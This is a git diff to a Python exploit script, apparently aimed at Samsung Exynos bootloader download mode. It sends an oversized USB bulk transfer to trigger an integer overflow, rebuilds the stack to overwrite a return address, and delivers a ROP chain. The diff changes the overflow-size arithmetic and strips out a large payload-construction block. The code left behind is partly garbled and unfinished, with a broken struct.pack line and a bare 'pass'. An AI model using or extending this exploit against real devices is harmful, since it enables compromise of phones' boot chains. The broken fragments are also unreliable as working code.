diff --git a/exploit.py b/exploit.py
index 52c8579..65adbf7 100644
--- a/exploit.py
+++ b/exploit.py
@@ -92,8 +92,9 @@ class ExynosDevice():
 current_offset = TARGET_OFFSETS[self.target][0]
 transferred = ctypes.c_int()
- size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
+ size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
 max_payload_size = 0x100000000 - size_to_overflow
+ ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE)
 # max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
 # max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
@@ -133,11 +134,8 @@ class ExynosDevice():
 cnt += 1
 print(f"{cnt} {hex(current_offset)}")
- rop_chain = (b"\x00" * 0x110) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
- # p_offset = (TARGET_OFFSETS[self.target][1] - current_offset)
- # rop_chain = rop_chain[:p_offset] + (p64(TARGET_OFFSETS[self.target][0]))
- # rop_chain = p64(TARGET_OFFSETS[self.target][0]) * 32
- # Should
+ # Build ROP chain.
+ rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
 transferred = ctypes.c_int(0)
 res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
 # assert transferred.value == len(rop_chain), "Error sending ROP chain"
@@ -146,70 +144,7 @@ class ExynosDevice():
 res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
- padding_size = TARGET_OFFSETS[self.target][1] - TARGET_OFFSETS[self.target][0]
- padding_size -= len(payload)
-
-
- # Construct payload, we can only overflow with 1 transfer.
- dl_buf_current = DL_BUFFER_START
-
- if len(payload) > MAX_PAYLOAD_SIZE:
- print("payload too big!")
- return
-
- payload = payload + ((MAX_PAYLOAD_SIZE - len(payload)) * b"\xcc")
- payload = struct.pack(" 0):
- block_cnt -= 1
- padding_size = BLOCK_SIZE
-
-
- ram_size = padding_size + 4 + 2
-
- # # Reconstruct stack
- ram = b"\xcc" * ram_size
- ram = ram[:padding_size] + p32(TARGET_OFFSETS[self.target][0]) + ram[padding_size + 4:]
-
- # *(uint32_t*)&ram[padding_size] = targets[target_id][XFER_BUFFER];//overwriting return address in stack :]
- payload_size = len(payload) + (CHUNK_SIZE * chunk_cnt) + (BLOCK_SIZE * block_cnt) + ram_size
 pass
- # payload->size = original_payload_size + (CHUNK_SIZE * chunk_cnt) + (BLOCK_SIZE * block_cnt) + ram_size;
- # dprint("malicious payload->size=0x%x\n", payload->size);
-
- # uint32_t min_size_to_overflw = (uint32_t)0 - targets[target_id][XFER_BUFFER];
- # dprint("min_size_to_overflw = 0x%x\n", min_size_to_overflw);
- # if(min_size_to_overflw > payload->size)
- # printf("ERROR : min_size_to_overflw > payload->size\n");
-
- # // step 3 : usb communication
- # printf("- exploit: sending payload...\n");
- # rc = libusb_bulk_transfer(handle, LIBUSB_ENDPOINT_OUT | 2, (uint8_t*)payload, original_payload_size, &transferred, 0);
- # if(rc) {
- # printf("libusb_bulk_transfer LIBUSB_ENDPOINT_OUT: error %d\n", rc);
- # fprintf(stderr, "Error libusb_bulk_transfer: %s\n", libusb_error_name(rc));
- # return rc;
- # }
 if __name__ == "__main__":